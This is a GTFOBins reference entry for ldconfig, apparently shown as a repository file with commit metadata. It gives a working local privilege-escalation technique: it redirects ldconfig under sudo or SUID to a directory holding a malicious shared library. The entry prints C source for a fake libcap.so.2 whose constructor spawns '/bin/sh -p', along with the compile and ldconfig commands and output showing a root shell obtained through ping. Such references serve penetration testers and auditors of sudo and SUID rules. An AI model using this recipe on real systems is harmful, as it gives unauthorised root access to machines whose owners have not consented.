GTFOBins.github.io/_gtfobins/ldconfig.md
Andrea Cardaci 391d436fc5 Add ldconfig
Close #68.
2019-08-14 13:14:57 +02:00

1.5 KiB

description functions
Follows a minimal example of how to use the described technique (details may change across different distributions). Run the code associated with the technique. Identify a target SUID executable, for example the `libcap` library of `ping`: ``` $ ldd /bin/ping | grep libcap libcap.so.2 => /tmp/tmp.9qfoUyKaGu/libcap.so.2 (0x00007fc7e9797000) ``` Create a fake library that spawns a shell at bootstrap: ``` echo '#include <unistd.h> __attribute__((constructor)) static void init() { execl("/bin/sh", "/bin/sh", "-p", NULL); } ' >"$TF/lib.c" ``` Compile it with: ``` gcc -fPIC -shared "$TF/lib.c" -o "$TF/libcap.so.2" ``` Run `ldconfig` again as described below then just run `ping` to obtain a root shell: ``` $ ping # id uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user) ```
sudo limited-suid
description code
This allows to override one or more shared libraries. Beware though that it is easy to *break* target and other binaries. TF=$(mktemp -d) echo "$TF" > "$TF/conf" # move malicious libraries in $TF sudo ldconfig -f "$TF/conf"
description code
This allows to override one or more shared libraries. Beware though that it is easy to *break* target and other binaries. TF=$(mktemp -d) echo "$TF" > "$TF/conf" # move malicious libraries in $TF ./ldconfig -f "$TF/conf"